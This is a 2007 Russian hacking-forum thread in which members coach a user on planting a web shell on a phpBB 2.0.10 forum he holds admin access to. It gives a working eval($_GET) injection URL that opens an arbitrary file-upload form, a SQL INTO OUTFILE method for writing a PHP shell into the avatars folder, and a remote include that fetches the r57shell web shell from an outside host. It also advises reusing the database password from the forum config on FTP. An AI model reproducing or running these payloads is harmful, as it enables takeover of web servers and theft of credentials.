Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Заливка шелла в phpBB 2.0.10 |
15.03.2007, 15:35
|
|
Познающий
Регистрация: 22.01.2007
Сообщений: 32
Провел на форуме:
214445
Репутация:
0
|
|
Заливка шелла в phpBB 2.0.10
Форум - phpBB 2.0.10
Есть доступ к админке.
Не получается залить шелл ни через уязвимость highlight, ни через стили, ни через профайл, ни через заливку sql (восстановление БД).
Попробовал через загрузку аватары - пишет, что максимальный размер 9 кб. Такая же история (про аватару) через багу ShanKaR'а. 
Посоветуйте что-нибудь, plizzzzzzzz !!!
Ща поковырялся и получилось c помощью видео ShAnKaR'а вставить в профиль функию phpinfo().
А bandera объяснял о функции - a:include($_GET[w])
http://forum.antichat.ru/thread24488.html
Я делал всё так и ничего не происходит.
Почему?
Последний раз редактировалось Koller; 15.03.2007 в 16:20..
|
|
|
15.03.2007, 15:56
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
мм а с аватарой проблему не решить путем увеличения лимита загружаемого файла? или о_0 это в админке не редактируется?
мм хотя мб там фильтрация стоит, но все же проверь..
Последний раз редактировалось n1†R0x; 15.03.2007 в 15:58..
|
|
|
|
15.03.2007, 15:58
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597
Репутация:
1866
|
|
Сообщение от n1†R0x
мм а с аватарой проблему не решить путем увеличения лимита загружаемого файла? или о_0 это в админке не редактируется?
мм хотя мб там фильтрация стоит, но все же проверь..
а что 9Кб это разве много по сути? 
|
|
|
|
15.03.2007, 16:05
|
|
Участник форума
Регистрация: 03.10.2006
Сообщений: 205
Провел на форуме:
446721
Репутация:
69
|
|
увеличь размер загрузки аватарки через админку и загруси туды шелл!
|
|
|
|
15.03.2007, 16:16
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
Сообщение от ice1k
а что 9Кб это разве много по сути? немного)
но раз у ТСа не вышло, значит у него шелл >9kb :logika: 
|
|
|
|
15.03.2007, 20:39
|
|
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме:
4646474
Репутация:
1424
|
|
Сообщение от SSSetuPPP
А bandera объяснял о функции - a:include($_GET[w])
Я делал всё так и ничего не происходит.
Почему? ну инклуде http не всегда работает в силу нескоьких причин , поэтому чтобы проверить что происходит ли вобще php injection тестим на phpinfo() например, а вобще можно и без include обойтись, например с помощью eval($_GET[q]):
http://forum.com/profile.php?q=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@co py($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go_up></form>
Последний раз редактировалось Koller; 15.03.2007 в 23:50..
|
|
|
|
16.03.2007, 13:10
|
|
Познающий
Регистрация: 22.01.2007
Сообщений: 32
Провел на форуме:
214445
Репутация:
0
|
|
Ответ...
Сообщение от GrAmOzEkA
А чем это не нравится? Просто создаёш файл 1.sql с содержимым ниже и импортируеш:
А потом просто инклудиш: www.test2.ru/phpbb/images/avatars/shell.php?inc=http://inferno23x.jino-net.ru/shells/r57shell.txt
Вот, что получается:
Error importing backup file
DEBUG MODE
SQL Error : 1045 Access denied for user 'user'@'localhost' (using password: YES)
SELECT cat_title INTO OUTFILE '/путь до папки forum/images/avatars/shell.php' FROM phpbb_categories where cat_id=99999
Line : 980
File : /путь до папки forum/admin/admin_db_utilities.php
Сообщение от ShAnKaR
ну инклуде http не всегда работает в силу нескоьких причин , поэтому чтобы проверить что происходит ли вобще php injection тестим на phpinfo() например, а вобще можно и без include обойтись, например с помощью eval($_GET[q]):
http://forum.com/profile.php?q=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@co py($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go_up></form>
Я новичок, и не совсем понимаю.... Объясни пожалуйста пошагово....
Сообщение от n1†R0x
мм а с аватарой проблему не решить путем увеличения лимита загружаемого файла? или о_0 это в админке не редактируется?
мм хотя мб там фильтрация стоит, но все же проверь..
Увеличил я размер загружаемой аватары и сделал как описывал k1b0rg в статье:
http://forum.antichat.ru/thread32782.html
И всё равно ничего не вышло...
Пишет:
Файл аватары должен быть .jpg, .gif или .png
, хотя я и переименовывал в jpg, gif.
Последний раз редактировалось Koller; 16.03.2007 в 14:32..
|
|
|
|
16.03.2007, 18:41
|
|
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме:
4646474
Репутация:
1424
|
|
Сообщение от GrAmOzEkA
Ищи путь до какойнибудь расширенной папки не обязательно она может быть в дире с форумом. И ещё подредактируй файл 1.sql
фигню пишешь дружище ты сам то пробовал только на своем компе небось?
меня слушай автор топика
|
|
|
|
25.03.2007, 17:45
|
|
Познающий
Регистрация: 22.01.2007
Сообщений: 32
Провел на форуме:
214445
Репутация:
0
|
|
Не понял...
Сообщение от ShAnKaR
фигню пишешь дружище ты сам то пробовал только на своем компе небось?
меня слушай автор топикаShAnKaR, объясни пожалуйста пошагово...
|
|
|
|
26.03.2007, 00:18
|
|
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме:
4646474
Репутация:
1424
|
|
Сообщение от SSSetuPPP
ShAnKaR, объясни пожалуйста пошагово...
кароче
Ща поковырялся и получилось c помощью видео ShAnKaR'а вставить в профиль функию phpinfo().
А bandera объяснял о функции - a:include($_GET[w])
вот вместо a:include($_GET[w])
ставишь a:eval($_GET[w])
потом идешь как и в случае с include по адресу
/profile.php?mode=editprofile&w=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@co py($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go_up></form>
если все ok появляется формочка для заливки файла , и тут уже можешь залить все что надо, залитое сохраняется в корневой папке форума в данном случае, это самый простой способ я думаю , но можно например воспользоватся другими функциями php например fopen,fwrite и тп для создания файла.
можно так же если не получится залить файл в папку с форумом залить в /tmp, а потом проинклудить его из /tmp.
если вобще ни куда не получится залить, можно посмотреть конфиг форума с пасом от бд и попробовать пасы на ftp например.
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
